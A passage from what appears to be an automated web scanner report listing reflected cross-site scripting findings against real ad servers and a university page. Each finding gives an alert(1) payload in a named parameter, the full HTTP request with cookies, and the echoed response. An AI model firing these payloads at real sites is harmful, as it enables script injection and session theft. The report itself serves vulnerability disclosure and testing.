Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 02:41:03 GMT
Date: Sun, 04 Sep 2011 02:41:03 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"6864322", c3:"c09f3<script>alert(1)</script>0f05b6d2d69", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

6.93. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 582f7<script>alert(1)</script>fc5b3be0a1c was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=582f7<script>alert(1)</script>fc5b3be0a1c&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 02:41:05 GMT
Date: Sun, 04 Sep 2011 02:41:05 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"582f7<script>alert(1)</script>fc5b3be0a1c", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

6.94. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload d9b47<script>alert(1)</script>c2908fe773b was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=d9b47<script>alert(1)</script>c2908fe773b&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 02:41:07 GMT
Date: Sun, 04 Sep 2011 02:41:07 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"d9b47<script>alert(1)</script>c2908fe773b", c6:"", c10:"", c15:"", c16:"", r:""});

6.95. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload e0d71<script>alert(1)</script>e06bf299a95 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=&c6=e0d71<script>alert(1)</script>e06bf299a95&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 02:41:09 GMT
Date: Sun, 04 Sep 2011 02:41:09 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"e0d71<script>alert(1)</script>e06bf299a95", c10:"", c15:"", c16:"", r:""});

6.96. http://bid.openx.net/json [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bid.openx.net
Path:	/json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 988b0<script>alert(1)</script>f70ef4ad754 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_41207221382988b0<script>alert(1)</script>f70ef4ad754&pid=05eaa309-64d4-c0a7-d349-bc1b1d68d17f&s=728x90&f=0.85&url=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917&cid=oxpv1%3A34-632-1929-2023-5730&hrid=edb2a1dc7ff395103b661a785688d648-1315103288 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=5730&cb=1737249030&ct0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/ndtv.com/ROS/L12/1737249030/Top/Martini/Openx_05182011_ron__051811_260/openx_728_leader2.html/4d686437616b356934616b41434d6658?http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http%3A//www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917//pubclick//Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: p=1315106851; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_41207221382988b0<script>alert(1)</script>f70ef4ad754({"r":null});

6.97. http://cps.regis.edu/lp/computer_degree/it_degree.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cps.regis.edu
Path:	/lp/computer_degree/it_degree.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6f2f"><script>alert(1)</script>099e2b27aef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lp/computer_degree/it_degree.php?c6f2f"><script>alert(1)</script>099e2b27aef=1 HTTP/1.1
Host: cps.regis.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:13:21 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a DAV/2 mod_bwlimited/1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Cache-Control: max-age=1, private, must-revalidate
Connection: close
Content-Type: text/html
Content-Length: 13905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<form id="lp3" action="
/lp/computer_degree/it_degree.php?c6f2f"><script>alert(1)</script>099e2b27aef=1"
method="post">
...[SNIP]...

6.98. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-504/d2/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66f93"%3balert(1)//3b48d076b2d was submitted in the $ parameter. This input was echoed as 66f93";alert(1)//3b48d076b2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-504/d2/jsc/fm.js?c=4/2/1&a=0&f=&n=767&r=13&d=14&q=&$=66f93"%3balert(1)//3b48d076b2d&s=0&z=0.472774357534945 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFMChanCap=2457780B305,825#722607|0,1#0,24; ZEDOIDX=13; FFMCap=2457900B1185,234056|0,1#0,24; FFcat=1185,589,14:305,825,15; FFad=0:0; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1185:aa378$767:66f93";alert(1)//3b48d076b2d;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,471,14:767,4,14:826,471,0:767,4,0:0,4,14:1185,589,14:305,825,15400f7829541bf3ff04cc1481;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=39:57:31:31:31:None:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "182787-8952-4aa4dd27613c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=170
Expires: Sun, 04 Sep 2011 02:36:55 GMT
Date: Sun, 04 Sep 2011 02:34:05 GMT
Content-Length: 5199
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat=',66f93";alert(1)//3b48d076b2d';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,66f93";alert(1)//3b48d076b2d;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;

var hashval = location.hash;
var pubdomain = hashv
...[SNIP]...

6.99. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-504/d2/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86fb0'%3balert(1)//9b7f2112fb9 was submitted in the $ parameter. This input was echoed as 86fb0';alert(1)//9b7f2112fb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-504/d2/jsc/fm.js?c=4/2/1&a=0&f=&n=767&r=13&d=14&q=&$=86fb0'%3balert(1)//9b7f2112fb9&s=0&z=0.472774357534945 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFMChanCap=2457780B305,825#722607|0,1#0,24; ZEDOIDX=13; FFMCap=2457900B1185,234056|0,1#0,24; FFcat=1185,589,14:305,825,15; FFad=0:0; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1185:aa378$767:86fb0';alert(1)//9b7f2112fb9;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,471,14:767,4,14:826,471,0:767,4,0:0,4,14:1185,589,14:305,825,15400f7829541bf3ff04cc1481;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=41:59:31:31:31:None:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "182787-8952-4aa4dd27613c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=170
Expires: Sun, 04 Sep 2011 02:36:56 GMT
Date: Sun, 04 Sep 2011 02:34:06 GMT
Content-Length: 5199
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat=',86fb0';alert(1)//9b7f2112fb9';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,86fb0';alert(1)//9b7f2112fb9;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasA
...[SNIP]...

6.100. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-504/d2/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ef75'-alert(1)-'7fbf108acb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-504/d2/jsc/fm.js?5ef75'-alert(1)-'7fbf108acb6=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 958
Content-Type: application/x-javascript
Set-Cookie: FFad=69:28:0:0:0:0:0:47:1:1:0:1]]>>:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:767,4,94:826,471,9:767,4,9:767,4,41:933,56,15:826,471,14:767,4,14:305,825,15:305,825,0:0,825,15:305,0,15:0,0,0]]>>;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "182787-8952-4aa4dd27613c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=221
Expires: Sun, 04 Sep 2011 04:18:20 GMT
Date: Sun, 04 Sep 2011 04:14:39 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

y10.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-504/d2;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-504/d2/jsc/fm.js;qs=5ef75'-alert(1)-'7fbf108acb6=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.
...[SNIP]...

6.101. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-504/d2/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23241"%3balert(1)//334de1eba6b was submitted in the q parameter. This input was echoed as 23241";alert(1)//334de1eba6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-504/d2/jsc/fm.js?c=4/2/1&a=0&f=&n=767&r=13&d=14&q=23241"%3balert(1)//334de1eba6b&$=&s=0&z=0.472774357534945 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFMChanCap=2457780B305,825#722607|0,1#0,24; ZEDOIDX=13; FFMCap=2457900B1185,234056|0,1#0,24; FFcat=1185,589,14:305,825,15; FFad=0:0; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=11:29:31:31:31:None:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,471,14:767,4,14:826,471,0:767,4,0:0,4,14:1185,589,14:305,825,15400f7829541bf3ff04cc1481;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "182787-8952-4aa4dd27613c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=172
Expires: Sun, 04 Sep 2011 02:36:55 GMT
Date: Sun, 04 Sep 2011 02:34:03 GMT
Content-Length: 5196
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='23241";alert(1)//334de1eba6b';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=23241";alert(1)//334de1eba6b;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;

var hashval = location.hash;
var pubdomain = hashv
...[SNIP]...

6.102. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-504/d2/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4142'%3balert(1)//001a6cf669d was submitted in the q parameter. This input was echoed as a4142';alert(1)//001a6cf669d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-504/d2/jsc/fm.js?c=4/2/1&a=0&f=&n=767&r=13&d=14&q=a4142'%3balert(1)//001a6cf669d&$=&s=0&z=0.472774357534945 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFMChanCap=2457780B305,825#722607|0,1#0,24; ZEDOIDX=13; FFMCap=2457900B1185,234056|0,1#0,24; FFcat=1185,589,14:305,825,15; FFad=0:0; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=13:31:31:31:31:None:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,471,14:767,4,14:826,471,0:767,4,0:0,4,14:1185,589,14:305,825,15400f7829541bf3ff04cc1481;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "182787-8952-4aa4dd27613c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=171
Expires: Sun, 04 Sep 2011 02:36:55 GMT
Date: Sun, 04 Sep 2011 02:34:04 GMT
Content-Length: 5196
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='a4142';alert(1)//001a6cf669d';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=a4142';alert(1)//001a6cf669d;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd
...[SNIP]...

6.103. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-504/d8/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb964'%3balert(1)//edb6405d7c3 was submitted in the $ parameter. This input was echoed as cb964';alert(1)//edb6405d7c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-504/d8/jsc/fm.js?c=589/122/121&a=0&f=&n=1185&r=13&d=14&q=&$=cb964'%3balert(1)//edb6405d7c3&s=76&z=0.1346084768883884 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1185:cb964';alert(1)//edb6405d7c3,f81ab';expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1185,589,14:1185,589,0:0,589,14:305,825,15400f7829e448bcadddbc6079;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=6:31:31:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "4368e0d-8952-4aa4dfbf231c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=145
Expires: Sun, 04 Sep 2011 02:34:39 GMT
Date: Sun, 04 Sep 2011 02:32:14 GMT
Content-Length: 4591
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=76;var zzPat='cb964';alert(1)//edb6405d7c3,f81ab'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=cb964';alert(1)//edb6405d7c3,f81ab';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311'
...[SNIP]...

6.104. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-504/d8/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd578"-alert(1)-"a6a3f2f621b was submitted in the $ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-504/d8/jsc/fm.js?c=589/122/121&a=0&f=&n=1185&r=13&d=14&q=&$=dd578"-alert(1)-"a6a3f2f621b&s=76&z=0.1346084768883884 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
